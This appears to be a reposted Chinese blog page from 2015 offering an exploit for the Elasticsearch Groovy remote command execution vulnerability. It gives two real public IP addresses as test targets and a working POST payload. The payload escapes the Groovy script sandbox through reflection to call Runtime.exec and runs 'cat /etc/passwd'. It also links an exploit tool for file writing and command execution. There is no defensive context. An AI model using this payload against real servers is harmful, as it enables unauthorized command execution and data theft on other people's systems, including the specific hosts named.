码迷,mamicode.com
首页 > 其他好文 > 详细

Elasticsearch Groovy任意命令执行漏洞EXP

时间:2015-03-06 09:38:46      阅读:195      评论:0      收藏:0      [点我收藏+]

标签:

测试url:http://190.196.67.252:9200/_search?pretty

http://191.234.18.14:9200///_search?pretty

 

POST提交

{“size”:1,”script_fields”: {“iswin”: {“script”:”java.lang.Math.class.forName(\”java.io.BufferedReader\”).getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\”java.io.InputStreamReader\”).getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”cat /etc/passwd\”).getInputStream())).readLines()”,”lang”: “groovy”}}}

 

 

下面直接上EXP

技术分享

文件写入 管理 命令执行

https://github.com/Svti/ElasticSearchEXP/

Elasticsearch Groovy任意命令执行漏洞EXP

标签:

原文地址:http://www.cnblogs.com/milantgh/p/4317220.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!